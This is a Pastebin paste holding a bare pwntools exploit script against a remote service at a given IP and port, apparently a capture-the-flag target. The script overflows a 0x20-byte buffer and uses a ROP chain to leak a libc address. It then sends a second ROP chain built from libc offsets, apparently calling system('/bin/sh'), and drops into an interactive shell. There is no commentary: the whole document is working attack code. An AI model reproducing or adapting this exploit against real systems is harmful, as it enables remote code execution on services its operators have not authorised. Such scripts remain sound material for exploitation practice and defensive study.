Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- p = remote("34.170.146.252", 64830)
- payload1 = b"A" * 0x20
- payload1 += p64(0x404b00)
- payload1 += p64(0x401176)
- payload1 += p64(0x404008)
- payload1 += p64(0x40118b)
- p.sendline(payload1)
- p.recvuntil(b"name\n")
- libc = u64(p.recvline()[:6] + b'\x00' * 2) - 0x08f750
- print(f'{hex(libc)=}')
- payload2 = b"A" * 0x20
- payload2 += p64(0x404c00)
- payload2 += p64(libc + 0x2882f)
- payload2 += p64(libc + 0x10f78b)
- payload2 += p64(libc + 0x1cb42f)
- payload2 += p64(libc + 0x058750)
- p.sendline(payload2)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment